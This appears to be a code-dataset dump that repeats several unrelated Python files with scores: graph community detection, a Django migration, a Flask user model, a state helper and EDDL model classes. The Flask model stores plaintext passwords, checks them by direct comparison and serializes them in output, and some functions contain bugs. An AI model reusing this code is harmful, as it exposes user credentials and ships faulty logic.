# copy because we now modify elements
for i in range(len_nodes):
sub_b[i, i] -= sub_b[i, :].sum()
# eigenvalues, eigenvectors
(w, v) = eigensystem(sub_b)
# find largest positive eigenvalue
i = real(w).argmax()
# convert to sign vector as defined on pg. 8579
s = array([(1 if x > 0 else -1) for x in real(v[:, i])])
# # find the dominant eigenvector by power method as in eq. 7
# vec_new = numpy.ones(len_nodes)
## vec_new = numpy.random.random_sample(len_nodes)
## vec_new /= norm(vec_new)
# for i in range(max_iter):
# vec_old = vec_new
## vec_new = dot(sub_adj.A, vec_old) - (dot(deg, dot(deg, vec_old)) / m2)
# vec_new = dot(sub_b.A, vec_old)
# vec_new /= norm(vec_new)
## if abs(vec_new - vec_old).sum() < threshold:
# if (norm(vec_new - vec_old) / norm(vec_old)) < threshold:
# break
# if i == max_iter:
# raise UtilsError("power method failed to converge")
# # convert to sign vector as defined on pg. 8579
# s = array([(1 if x > 0 else -1) for x in vec_new])
# dQ as in eq. 2 and 5
d_q = dot(s, dot(sub_b.A, s)) / m4
if d_q <= error_margin:
return False
if refine:
kernighan_lin_refinement(s, sub_b)
d_q = dot(s, dot(sub_b.A, s)) / m4
spectral_community_detection.modularity += d_q
group1 = list()
group2 = list()
for (i, sign) in enumerate(s):
if sign > 0:
group1.append(nbunch[i])
else:
group2.append(nbunch[i])
return [group1, group2]
if graph.is_directed():
raise nx.NetworkXError("only undirected graphs are allowed")
# basic measures
n = graph.order()
m2 = graph.size() * 2.0
m4 = m2 * 2.0
if n == 0 or m2 == 0:
raise nx.NetworkXError("graph does not contain any nodes or links")
nbunch = sorted(graph.nodes())
indices = range(n)
mapping = dict(itertools.izip(indices, nbunch))
# construct adjacency matrix
if nx.density(graph) < 0.5:
adj = nx.to_scipy_sparse_matrix(graph, nodelist=nbunch)
else:
adj = nx.to_numpy_matrix(graph, nodelist=nbunch)
# store the degree of each node in an array at corresponding index
degrees = adj.sum(axis=0).A1
# construct modularity matrix
b = adj - (kronecker(degrees, degrees) / m2).reshape(n, n)
# initialize algorithm
communities = list()
spectral_community_detection.modularity = 0.0
partitions = Queue()
partitions.put(indices)
while not partitions.empty():
indices = partitions.get()
if not indices:
continue
groups = _split(indices)
if not groups:
communities.append(set([mapping[i] for i in indices]))
else:
partitions.put(groups[0])
partitions.put(groups[1])
return (spectral_community_detection.modularity, communities)
def directed_spectral_community_detection(graph, weighted=True, threshold=1E-12,
refine=True):
"""
"""
dot = numpy.dot
ix = numpy.ix_
kronecker = numpy.kron
array = numpy.array
real = numpy.real
eigensystem = numpy.linalg.eig
def _split(nbunch):
len_nodes = len(nbunch)
# use the relevant subpart of the modularity matrix
sub_b = b[ix(nbunch, nbunch)].copy()
# copy because we now modify elements
for i in range(len_nodes):
sub_b[i, i] -= (sub_b[i, :].sum() + sub_b[:, i].sum()) / 2.0
# eigenvalues, eigenvectors
(w, v) = eigensystem(sub_b)
# find largest positive eigenvalue
i = real(w).argmax()
# convert to sign vector as defined on pg. 8579
s = array([(1 if x > 0 else -1) for x in real(v[:, i])])
# dQ as in eq. 2 and 5
d_q = dot(s, dot(sub_b.A, s)) / m4
if d_q <= threshold:
return False
if refine:
kernighan_lin_refinement(s, sub_b)
d_q = dot(s, dot(sub_b.A, s)) / m4
spectral_community_detection.modularity += d_q
group1 = list()
group2 = list()
for (i, sign) in enumerate(s):
if sign > 0:
group1.append(nbunch[i])
else:
group2.append(nbunch[i])
return (group1, group2)
if not graph.is_directed():
raise nx.NetworkXError("only directed graphs are allowed")
# basic measures
n = graph.order()
m = float(graph.size())
m4 = m * 4.0
if n == 0 or m == 0:
raise nx.NetworkXError("graph does not contain any nodes or links")
nbunch = sorted(graph.nodes())
indices = range(n)
mapping = dict(itertools.izip(indices, nbunch))
# construct adjacency matrix
if nx.density(graph) < 0.5:
adj = nx.to_scipy_sparse_matrix(graph, nodelist=nbunch)
else:
adj = nx.to_numpy_matrix(graph, nodelist=nbunch)
# networkx adjacency matrix Aij = 1 if there is a link i -> j
# the paper uses the other orientation
adj = adj.T
# store the degree of each node in an array at corresponding index
in_degrees = adj.sum(axis=0).A1
out_degrees = adj.sum(axis=1).A1
# construct modularity matrix
b = adj - (kronecker(in_degrees, out_degrees) / m).reshape(n, n)
# symmetrize
b = b + b.T
# initialize algorithm
communities = list()
spectral_community_detection.modularity = 0.0
partitions = Queue()
partitions.put(indices)
while not partitions.empty():
indices = partitions.get()
if not indices:
continue
groups = _split(indices)
if not groups:
communities.append(set([mapping[i] for i in indices]))
else:
partitions.put(groups[0])
partitions.put(groups[1])
return (spectral_community_detection.modularity, communities) | meb/utils/network/algorithms.py | import itertools
import numpy
import networkx as nx
from Queue import Queue
def graph_symmetries(graph):
"""
Finds all symmetries of a graph. This is computationally very expensive
O(N!) where N is the number of nodes in graph.
"""
permutations = [dict(zip(graph.nodes_iter(), perm)) for perm in
itertools.permutations(graph.nodes_iter())]
keys = subgraph.nodes()
keys.sort()
symmetries = [[perm[node] for node in keys] for perm in permutations if
all(graph.has_edge(perm[src], perm[tar])
for (src, tar) in graph.edges_iter())]
return symmetries
def kernighan_lin_refinement(s, b):
"""
Parameters
----------
s: array-like
State vector partitioning the nodes into communities (contains 1s and
-1s).
b: matrix
Modularity matrix.
"""
dot = numpy.dot
def flip(v, pos):
v[pos] = -v[pos]
dq = dot(v, dot(b.A, v))
v[pos] = -v[pos]
return dq
s_len = len(s)
trials = numpy.zeros(s_len)
q_max = dot(s, dot(b.A, s))
while True:
for i in xrange(s_len):
trials[i] = flip(s, i)
dq = trials.max()
if dq > q_max:
i = trials.argmax()
s[i] = -s[i]
q_max = dq
else:
break
def spectral_community_detection(graph, weighted=True, threshold=1E-12,
error_margin=1E-12, refine=True, max_iter=500):
"""
Finds communities in a graph via spectral partitioning.
Requires a graph whose nodes are integers from 0 to (number of nodes - 1).
"""
dot = numpy.dot
norm = numpy.linalg.norm
ix = numpy.ix_
kronecker = numpy.kron
array = numpy.array
real = numpy.real
eigensystem = numpy.linalg.eig
def _split(nbunch):
len_nodes = len(nbunch)
# use the relevant subpart of the modularity matrix
sub_b = b[ix(nbunch, nbunch)].copy()
# copy because we now modify elements
for i in range(len_nodes):
sub_b[i, i] -= sub_b[i, :].sum()
# eigenvalues, eigenvectors
(w, v) = eigensystem(sub_b)
# find largest positive eigenvalue
i = real(w).argmax()
# convert to sign vector as defined on pg. 8579
s = array([(1 if x > 0 else -1) for x in real(v[:, i])])
# # find the dominant eigenvector by power method as in eq. 7
# vec_new = numpy.ones(len_nodes)
## vec_new = numpy.random.random_sample(len_nodes)
## vec_new /= norm(vec_new)
# for i in range(max_iter):
# vec_old = vec_new
## vec_new = dot(sub_adj.A, vec_old) - (dot(deg, dot(deg, vec_old)) / m2)
# vec_new = dot(sub_b.A, vec_old)
# vec_new /= norm(vec_new)
## if abs(vec_new - vec_old).sum() < threshold:
# if (norm(vec_new - vec_old) / norm(vec_old)) < threshold:
# break
# if i == max_iter:
# raise UtilsError("power method failed to converge")
# # convert to sign vector as defined on pg. 8579
# s = array([(1 if x > 0 else -1) for x in vec_new])
# dQ as in eq. 2 and 5
d_q = dot(s, dot(sub_b.A, s)) / m4
if d_q <= error_margin:
return False
if refine:
kernighan_lin_refinement(s, sub_b)
d_q = dot(s, dot(sub_b.A, s)) / m4
spectral_community_detection.modularity += d_q
group1 = list()
group2 = list()
for (i, sign) in enumerate(s):
if sign > 0:
group1.append(nbunch[i])
else:
group2.append(nbunch[i])
return [group1, group2]
if graph.is_directed():
raise nx.NetworkXError("only undirected graphs are allowed")
# basic measures
n = graph.order()
m2 = graph.size() * 2.0
m4 = m2 * 2.0
if n == 0 or m2 == 0:
raise nx.NetworkXError("graph does not contain any nodes or links")
nbunch = sorted(graph.nodes())
indices = range(n)
mapping = dict(itertools.izip(indices, nbunch))
# construct adjacency matrix
if nx.density(graph) < 0.5:
adj = nx.to_scipy_sparse_matrix(graph, nodelist=nbunch)
else:
adj = nx.to_numpy_matrix(graph, nodelist=nbunch)
# store the degree of each node in an array at corresponding index
degrees = adj.sum(axis=0).A1
# construct modularity matrix
b = adj - (kronecker(degrees, degrees) / m2).reshape(n, n)
# initialize algorithm
communities = list()
spectral_community_detection.modularity = 0.0
partitions = Queue()
partitions.put(indices)
while not partitions.empty():
indices = partitions.get()
if not indices:
continue
groups = _split(indices)
if not groups:
communities.append(set([mapping[i] for i in indices]))
else:
partitions.put(groups[0])
partitions.put(groups[1])
return (spectral_community_detection.modularity, communities)
def directed_spectral_community_detection(graph, weighted=True, threshold=1E-12,
refine=True):
"""
"""
dot = numpy.dot
ix = numpy.ix_
kronecker = numpy.kron
array = numpy.array
real = numpy.real
eigensystem = numpy.linalg.eig
def _split(nbunch):
len_nodes = len(nbunch)
# use the relevant subpart of the modularity matrix
sub_b = b[ix(nbunch, nbunch)].copy()
# copy because we now modify elements
for i in range(len_nodes):
sub_b[i, i] -= (sub_b[i, :].sum() + sub_b[:, i].sum()) / 2.0
# eigenvalues, eigenvectors
(w, v) = eigensystem(sub_b)
# find largest positive eigenvalue
i = real(w).argmax()
# convert to sign vector as defined on pg. 8579
s = array([(1 if x > 0 else -1) for x in real(v[:, i])])
# dQ as in eq. 2 and 5
d_q = dot(s, dot(sub_b.A, s)) / m4
if d_q <= threshold:
return False
if refine:
kernighan_lin_refinement(s, sub_b)
d_q = dot(s, dot(sub_b.A, s)) / m4
spectral_community_detection.modularity += d_q
group1 = list()
group2 = list()
for (i, sign) in enumerate(s):
if sign > 0:
group1.append(nbunch[i])
else:
group2.append(nbunch[i])
return (group1, group2)
if not graph.is_directed():
raise nx.NetworkXError("only directed graphs are allowed")
# basic measures
n = graph.order()
m = float(graph.size())
m4 = m * 4.0
if n == 0 or m == 0:
raise nx.NetworkXError("graph does not contain any nodes or links")
nbunch = sorted(graph.nodes())
indices = range(n)
mapping = dict(itertools.izip(indices, nbunch))
# construct adjacency matrix
if nx.density(graph) < 0.5:
adj = nx.to_scipy_sparse_matrix(graph, nodelist=nbunch)
else:
adj = nx.to_numpy_matrix(graph, nodelist=nbunch)
# networkx adjacency matrix Aij = 1 if there is a link i -> j
# the paper uses the other orientation
adj = adj.T
# store the degree of each node in an array at corresponding index
in_degrees = adj.sum(axis=0).A1
out_degrees = adj.sum(axis=1).A1
# construct modularity matrix
b = adj - (kronecker(in_degrees, out_degrees) / m).reshape(n, n)
# symmetrize
b = b + b.T
# initialize algorithm
communities = list()
spectral_community_detection.modularity = 0.0
partitions = Queue()
partitions.put(indices)
while not partitions.empty():
indices = partitions.get()
if not indices:
continue
groups = _split(indices)
if not groups:
communities.append(set([mapping[i] for i in indices]))
else:
partitions.put(groups[0])
partitions.put(groups[1])
return (spectral_community_detection.modularity, communities) | 0.598782 | 0.525491 |
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import uuid
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='HolviOrder',
fields=[
('code', models.CharField(max_length=32, primary_key=True, serialize=False, unique=True)),
('pool', models.CharField(max_length=32)),
('firstname', models.CharField(max_length=32)),
('lastname', models.CharField(max_length=32)),
('company', models.CharField(max_length=64)),
('email', models.CharField(max_length=64)),
('city', models.CharField(max_length=32)),
('country', models.CharField(max_length=8)),
('street', models.CharField(max_length=64)),
('postcode', models.CharField(max_length=16)),
('language', models.CharField(max_length=4)),
('phone', models.CharField(max_length=16)),
('paid', models.BooleanField()),
('create_time', models.DateTimeField()),
('paid_time', models.DateTimeField()),
],
),
migrations.CreateModel(
name='HolviPurchase',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('product_name', models.CharField(max_length=128)),
('order', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='purchases', to='holvi_orders.HolviOrder')),
],
),
migrations.CreateModel(
name='HolviWebshop',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('token', models.UUIDField(default=uuid.uuid4)),
('sender', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='holvi_webshops', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='HolviPurchaseAnswer',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('label', models.CharField(max_length=128)),
('answer', models.CharField(max_length=256)),
('purchase', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='answers', to='holvi_orders.HolviPurchase')),
],
),
migrations.AddField(
model_name='holviorder',
name='shop',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='orders', to='holvi_orders.HolviWebshop'),
),
] | django_server/holvi_orders/migrations/0001_initial.py |
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import uuid
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='HolviOrder',
fields=[
('code', models.CharField(max_length=32, primary_key=True, serialize=False, unique=True)),
('pool', models.CharField(max_length=32)),
('firstname', models.CharField(max_length=32)),
('lastname', models.CharField(max_length=32)),
('company', models.CharField(max_length=64)),
('email', models.CharField(max_length=64)),
('city', models.CharField(max_length=32)),
('country', models.CharField(max_length=8)),
('street', models.CharField(max_length=64)),
('postcode', models.CharField(max_length=16)),
('language', models.CharField(max_length=4)),
('phone', models.CharField(max_length=16)),
('paid', models.BooleanField()),
('create_time', models.DateTimeField()),
('paid_time', models.DateTimeField()),
],
),
migrations.CreateModel(
name='HolviPurchase',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('product_name', models.CharField(max_length=128)),
('order', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='purchases', to='holvi_orders.HolviOrder')),
],
),
migrations.CreateModel(
name='HolviWebshop',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('token', models.UUIDField(default=uuid.uuid4)),
('sender', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='holvi_webshops', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='HolviPurchaseAnswer',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('label', models.CharField(max_length=128)),
('answer', models.CharField(max_length=256)),
('purchase', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='answers', to='holvi_orders.HolviPurchase')),
],
),
migrations.AddField(
model_name='holviorder',
name='shop',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='orders', to='holvi_orders.HolviWebshop'),
),
] | 0.533641 | 0.120698 |
from app.setup import db, msmlw
from datetime import datetime
class User(db.Model):
__tablename__ = 'users'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(255), nullable=False)
password = db.Column(db.String(255), nullable=False)
created_at = db.Column(db.DateTime, nullable=False, default=datetime.now)
updated_at = db.Column(db.DateTime, nullable=False, default=datetime.now, onupdate=datetime.now)
def __repr__(self):
return '<User %r>' % self.name
class UserSchema(msmlw.SQLAlchemySchema):
class Meta:
model = User
fields = ('id', 'name', 'password')
class UserOperater():
def __init__(self):
self.user_schema = UserSchema()
self.users_schema = UserSchema(many=True)
def getUserList(self):
# select * from users
user_list = db.session.query(User).all()
if user_list == None:
return []
else:
return self.user_schema.jsonify(user_list)
def getUser(self, user):
# select * from users where name=${user.name}
result = db.session.query(User).filter_by(name=user['name']).first()
if result == None:
return []
else:
return self.user_schema.jsonify(result).json
def getUserFromID(self, aId):
result = db.session.query(User).filter_by(id=aId).first()
if result == None:
return []
else:
return self.user_schema.jsonify(result).json
def isExistUser(self, user):
# select * from users where name=${user.name}
result = db.session.query(User).filter_by(name=user['name']).first()
if result == None:
return False
else:
return True
def isUnAuthUser(self, user):
# select * from users where name=${user.name} password=${<PASSWORD>}
result = db.session.query(User).filter_by(
name=user['name'], password=user['password']).first()
if result == None:
return True
else:
return False
def registUser(self, user):
record = User(
name = user['name'],
password = user['password']
)
# insert into users(name, password) values(...)
db.session.add(record)
db.session.commit()
return self.user_schema.jsonify(record) | docker/flask/app/app/model/users.py | from app.setup import db, msmlw
from datetime import datetime
class User(db.Model):
__tablename__ = 'users'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(255), nullable=False)
password = db.Column(db.String(255), nullable=False)
created_at = db.Column(db.DateTime, nullable=False, default=datetime.now)
updated_at = db.Column(db.DateTime, nullable=False, default=datetime.now, onupdate=datetime.now)
def __repr__(self):
return '<User %r>' % self.name
class UserSchema(msmlw.SQLAlchemySchema):
class Meta:
model = User
fields = ('id', 'name', 'password')
class UserOperater():
def __init__(self):
self.user_schema = UserSchema()
self.users_schema = UserSchema(many=True)
def getUserList(self):
# select * from users
user_list = db.session.query(User).all()
if user_list == None:
return []
else:
return self.user_schema.jsonify(user_list)
def getUser(self, user):
# select * from users where name=${user.name}
result = db.session.query(User).filter_by(name=user['name']).first()
if result == None:
return []
else:
return self.user_schema.jsonify(result).json
def getUserFromID(self, aId):
result = db.session.query(User).filter_by(id=aId).first()
if result == None:
return []
else:
return self.user_schema.jsonify(result).json
def isExistUser(self, user):
# select * from users where name=${user.name}
result = db.session.query(User).filter_by(name=user['name']).first()
if result == None:
return False
else:
return True
def isUnAuthUser(self, user):
# select * from users where name=${user.name} password=${<PASSWORD>}
result = db.session.query(User).filter_by(
name=user['name'], password=user['password']).first()
if result == None:
return True
else:
return False
def registUser(self, user):
record = User(
name = user['name'],
password = user['password']
)
# insert into users(name, password) values(...)
db.session.add(record)
db.session.commit()
return self.user_schema.jsonify(record) | 0.437103 | 0.071397 |
import os
import logger
from utils import dict_from_file
def state_helper(def_state: dict, path: dict, log) -> tuple:
no_ini = not os.path.isfile(path['settings'])
no_state = not os.path.isfile(path['state'])
if no_state and no_ini:
return def_state, True, True
ini_version, merge, state_save = 0, 0, True
if not no_state:
try:
state = dict_from_file(path['state'])
ini_version = state['system']['ini_version']
merge = state['system']['merge']
except RuntimeError as e:
log('Broken {}, reset'.format(path['state']), logger.WARN)
state = def_state
else:
state['system'] = def_state['system']
else:
state = def_state
m = _Merge(merge, state, path, log)
state_save = ini_version != m.state['system']['ini_version']
return m.state, m.state['system']['ini_version'] > ini_version, state_save or m.state_save
class _Merge:
def __init__(self, start: int, state: dict, path: dict, log):
self.state_save = False
self.state = state
self.path = path
end = state['system']['merge']
for merge in range(start + 1, end + 1):
name = 'merge_{}'.format(merge)
if hasattr(self, name):
msg = 'Merge {} ... '.format(merge)
try:
getattr(self, name)()
except Exception as e:
log('{}{}'.format(msg, e), logger.ERROR)
else:
log('{}{}'.format(msg, 'ok'))
self.state_save = True
def merge_1(self):
for key in ('backup', 'update'):
file_path = os.path.join(self.path['data'], key + '.json')
if os.path.isfile(file_path):
data = dict_from_file(file_path)
os.remove(file_path)
if data and isinstance(data, dict):
if key == 'update':
key = 'updater'
self.state[key] = data | src/lib/state_helper.py | import os
import logger
from utils import dict_from_file
def state_helper(def_state: dict, path: dict, log) -> tuple:
no_ini = not os.path.isfile(path['settings'])
no_state = not os.path.isfile(path['state'])
if no_state and no_ini:
return def_state, True, True
ini_version, merge, state_save = 0, 0, True
if not no_state:
try:
state = dict_from_file(path['state'])
ini_version = state['system']['ini_version']
merge = state['system']['merge']
except RuntimeError as e:
log('Broken {}, reset'.format(path['state']), logger.WARN)
state = def_state
else:
state['system'] = def_state['system']
else:
state = def_state
m = _Merge(merge, state, path, log)
state_save = ini_version != m.state['system']['ini_version']
return m.state, m.state['system']['ini_version'] > ini_version, state_save or m.state_save
class _Merge:
def __init__(self, start: int, state: dict, path: dict, log):
self.state_save = False
self.state = state
self.path = path
end = state['system']['merge']
for merge in range(start + 1, end + 1):
name = 'merge_{}'.format(merge)
if hasattr(self, name):
msg = 'Merge {} ... '.format(merge)
try:
getattr(self, name)()
except Exception as e:
log('{}{}'.format(msg, e), logger.ERROR)
else:
log('{}{}'.format(msg, 'ok'))
self.state_save = True
def merge_1(self):
for key in ('backup', 'update'):
file_path = os.path.join(self.path['data'], key + '.json')
if os.path.isfile(file_path):
data = dict_from_file(file_path)
os.remove(file_path)
if data and isinstance(data, dict):
if key == 'update':
key = 'updater'
self.state[key] = data | 0.210604 | 0.175432 |
import logging
import os
from abc import ABC
from dataclasses import dataclass
from typing import List
import numpy as np
import onnx
import pyeddl.eddl as eddl
import stringcase
from pyeddl.tensor import Tensor
from slaid.commons.base import ImageInfo
from slaid.models import Factory as BaseFactory
from slaid.models import Model as BaseModel
logger = logging.getLogger('eddl-models')
fh = logging.FileHandler('/tmp/eddl.log')
logger.addHandler(fh)
class Model(BaseModel, ABC):
patch_size = None
default_image_info = ImageInfo(
ImageInfo.ColorType.BGR,
ImageInfo.Coord.YX,
ImageInfo.Channel.FIRST,
)
index_prediction = 1
def __init__(self,
net: eddl.Model,
weight_filename: str = None,
gpu: List = None,
image_info: ImageInfo = None,
name: str = None):
self._net = net
self._weight_filename = weight_filename
self._gpu = gpu
self.image_info = image_info or self.default_image_info
super().__init__(name)
@property
def weight_filename(self):
return self._weight_filename
def __str__(self):
return self.name
@property
def gpu(self) -> List:
return self._gpu
@property
def net(self):
return self._net
def predict(self, array: np.ndarray) -> np.ndarray:
predictions = self._predict(array)
temp_mask = []
for prob_T in predictions:
output_np = prob_T.getdata()
temp_mask.append(output_np[:, self.index_prediction])
flat_mask = np.vstack(temp_mask).flatten()
return flat_mask
def _predict(self, array: np.ndarray) -> List[Tensor]:
tensor = Tensor.fromarray(array)
prediction = eddl.predict(self._net, [tensor])
return prediction
class TissueModel(Model):
index_prediction = 1
default_image_info = ImageInfo(ImageInfo.ColorType.RGB, ImageInfo.Coord.YX,
ImageInfo.Channel.LAST,
ImageInfo.Range._0_255)
@staticmethod
def create_net():
in_ = eddl.Input([3])
layer = in_
layer = eddl.ReLu(eddl.Dense(layer, 50))
layer = eddl.ReLu(eddl.Dense(layer, 50))
layer = eddl.ReLu(eddl.Dense(layer, 50))
out = eddl.Softmax(eddl.Dense(layer, 2))
net = eddl.Model([in_], [out])
return net
class TumorModel(Model):
patch_size = (256, 256)
index_prediction = 1
default_image_info = ImageInfo(ImageInfo.ColorType.BGR, ImageInfo.Coord.YX,
ImageInfo.Channel.FIRST,
ImageInfo.Range._0_1)
@staticmethod
def create_net():
in_size = [256, 256]
num_classes = 2
in_ = eddl.Input([3, in_size[0], in_size[1]])
out = TumorModel._create_VGG16(in_, num_classes)
net = eddl.Model([in_], [out])
return net
@staticmethod
def _create_VGG16(in_layer, num_classes, seed=1234, init=eddl.HeNormal):
x = in_layer
x = eddl.ReLu(init(eddl.Conv(x, 64, [3, 3]), seed))
x = eddl.MaxPool(eddl.ReLu(init(eddl.Conv(x, 64, [3, 3]), seed)),
[2, 2], [2, 2])
x = eddl.ReLu(init(eddl.Conv(x, 128, [3, 3]), seed))
x = eddl.MaxPool(eddl.ReLu(init(eddl.Conv(x, 128, [3, 3]), seed)),
[2, 2], [2, 2])
x = eddl.ReLu(init(eddl.Conv(x, 256, [3, 3]), seed))
x = eddl.ReLu(init(eddl.Conv(x, 256, [3, 3]), seed))
x = eddl.MaxPool(eddl.ReLu(init(eddl.Conv(x, 256, [3, 3]), seed)),
[2, 2], [2, 2])
x = eddl.ReLu(init(eddl.Conv(x, 512, [3, 3]), seed))
x = eddl.ReLu(init(eddl.Conv(x, 512, [3, 3]), seed))
x = eddl.MaxPool(eddl.ReLu(init(eddl.Conv(x, 512, [3, 3]), seed)),
[2, 2], [2, 2])
x = eddl.ReLu(init(eddl.Conv(x, 512, [3, 3]), seed))
x = eddl.ReLu(init(eddl.Conv(x, 512, [3, 3]), seed))
x = eddl.MaxPool(eddl.ReLu(init(eddl.Conv(x, 512, [3, 3]), seed)),
[2, 2], [2, 2])
x = eddl.Reshape(x, [-1])
x = eddl.ReLu(init(eddl.Dense(x, 256), seed))
x = eddl.Softmax(eddl.Dense(x, num_classes))
return x
def to_onnx(model: Model, filename: str):
eddl.save_net_to_onnx_file(model.net, filename)
@dataclass
class Factory(BaseFactory):
filename: str
cls_name: str = None
gpu: List[int] = None
learn_rate = 1e-5
list_of_losses: List[str] = None
list_of_metrics: List[str] = None
def __post_init__(self):
self.list_of_losses = self.list_of_losses or ["soft_cross_entropy"]
self.list_of_metrics = self.list_of_metrics or ["categorical_accuracy"]
def get_model(self):
cls_name = self._get_cls_name()
cls = globals()[cls_name]
net = cls.create_net()
self._build_net(net)
eddl.load(net, self.filename, "bin")
return globals()[cls_name](net, name=os.path.basename(self.filename))
def _build_net(self, net):
eddl.build(net,
eddl.rmsprop(self.learn_rate),
self.list_of_losses,
self.list_of_metrics,
eddl.CS_GPU(self.gpu, mem="low_mem")
if self.gpu else eddl.CS_CPU(),
init_weights=False)
def _get_cls_name(self):
if self.cls_name:
cls_name = self.cls_name
else:
basename = os.path.basename(self.filename)
cls_name = basename.split('-')[0]
cls_name = stringcase.capitalcase(stringcase.camelcase(cls_name))
return cls_name
@dataclass
class OnnxFactory(Factory):
def get_model(self):
net = eddl.import_net_from_onnx_file(self.filename)
self._build_net(net)
cls_name = self._get_cls_name()
cls = globals()[cls_name]
image_info = self._update_image_info(cls.default_image_info)
return cls(net,
image_info=image_info,
name=os.path.basename(self.filename))
def _update_image_info(self, image_info: ImageInfo) -> ImageInfo:
image_info = ImageInfo(color_type=image_info.color_type,
coord=image_info.coord,
channel=image_info.channel,
pixel_range=image_info.pixel_range)
onnx_model = onnx.load(self.filename)
for prop in onnx_model.metadata_props:
if prop.key == "Image.BitmapPixelFormat":
color_type = prop.value[:3].lower()
image_info.color_type = ImageInfo.ColorType(color_type)
if prop.key == "Image.NominalPixelRange":
pixel_range = prop.value.split('_', 1)[1]
image_info.pixel_range = ImageInfo.Range(pixel_range)
return image_info | slaid/models/eddl.py | import logging
import os
from abc import ABC
from dataclasses import dataclass
from typing import List
import numpy as np
import onnx
import pyeddl.eddl as eddl
import stringcase
from pyeddl.tensor import Tensor
from slaid.commons.base import ImageInfo
from slaid.models import Factory as BaseFactory
from slaid.models import Model as BaseModel
logger = logging.getLogger('eddl-models')
fh = logging.FileHandler('/tmp/eddl.log')
logger.addHandler(fh)
class Model(BaseModel, ABC):
patch_size = None
default_image_info = ImageInfo(
ImageInfo.ColorType.BGR,
ImageInfo.Coord.YX,
ImageInfo.Channel.FIRST,
)
index_prediction = 1
def __init__(self,
net: eddl.Model,
weight_filename: str = None,
gpu: List = None,
image_info: ImageInfo = None,
name: str = None):
self._net = net
self._weight_filename = weight_filename
self._gpu = gpu
self.image_info = image_info or self.default_image_info
super().__init__(name)
@property
def weight_filename(self):
return self._weight_filename
def __str__(self):
return self.name
@property
def gpu(self) -> List:
return self._gpu
@property
def net(self):
return self._net
def predict(self, array: np.ndarray) -> np.ndarray:
predictions = self._predict(array)
temp_mask = []
for prob_T in predictions:
output_np = prob_T.getdata()
temp_mask.append(output_np[:, self.index_prediction])
flat_mask = np.vstack(temp_mask).flatten()
return flat_mask
def _predict(self, array: np.ndarray) -> List[Tensor]:
tensor = Tensor.fromarray(array)
prediction = eddl.predict(self._net, [tensor])
return prediction
class TissueModel(Model):
index_prediction = 1
default_image_info = ImageInfo(ImageInfo.ColorType.RGB, ImageInfo.Coord.YX,
ImageInfo.Channel.LAST,
ImageInfo.Range._0_255)
@staticmethod
def create_net():
in_ = eddl.Input([3])
layer = in_
layer = eddl.ReLu(eddl.Dense(layer, 50))
layer = eddl.ReLu(eddl.Dense(layer, 50))
layer = eddl.ReLu(eddl.Dense(layer, 50))
out = eddl.Softmax(eddl.Dense(layer, 2))
net = eddl.Model([in_], [out])
return net
class TumorModel(Model):
patch_size = (256, 256)
index_prediction = 1
default_image_info = ImageInfo(ImageInfo.ColorType.BGR, ImageInfo.Coord.YX,
ImageInfo.Channel.FIRST,
ImageInfo.Range._0_1)
@staticmethod
def create_net():
in_size = [256, 256]
num_classes = 2
in_ = eddl.Input([3, in_size[0], in_size[1]])
out = TumorModel._create_VGG16(in_, num_classes)
net = eddl.Model([in_], [out])
return net
@staticmethod
def _create_VGG16(in_layer, num_classes, seed=1234, init=eddl.HeNormal):
x = in_layer
x = eddl.ReLu(init(eddl.Conv(x, 64, [3, 3]), seed))
x = eddl.MaxPool(eddl.ReLu(init(eddl.Conv(x, 64, [3, 3]), seed)),
[2, 2], [2, 2])
x = eddl.ReLu(init(eddl.Conv(x, 128, [3, 3]), seed))
x = eddl.MaxPool(eddl.ReLu(init(eddl.Conv(x, 128, [3, 3]), seed)),
[2, 2], [2, 2])
x = eddl.ReLu(init(eddl.Conv(x, 256, [3, 3]), seed))
x = eddl.ReLu(init(eddl.Conv(x, 256, [3, 3]), seed))
x = eddl.MaxPool(eddl.ReLu(init(eddl.Conv(x, 256, [3, 3]), seed)),
[2, 2], [2, 2])
x = eddl.ReLu(init(eddl.Conv(x, 512, [3, 3]), seed))
x = eddl.ReLu(init(eddl.Conv(x, 512, [3, 3]), seed))
x = eddl.MaxPool(eddl.ReLu(init(eddl.Conv(x, 512, [3, 3]), seed)),
[2, 2], [2, 2])
x = eddl.ReLu(init(eddl.Conv(x, 512, [3, 3]), seed))
x = eddl.ReLu(init(eddl.Conv(x, 512, [3, 3]), seed))
x = eddl.MaxPool(eddl.ReLu(init(eddl.Conv(x, 512, [3, 3]), seed)),
[2, 2], [2, 2])
x = eddl.Reshape(x, [-1])
x = eddl.ReLu(init(eddl.Dense(x, 256), seed))
x = eddl.Softmax(eddl.Dense(x, num_classes))
return x
def to_onnx(model: Model, filename: str):
eddl.save_net_to_onnx_file(model.net, filename)
@dataclass
class Factory(BaseFactory):
filename: str
cls_name: str = None
gpu: List[int] = None
learn_rate = 1e-5
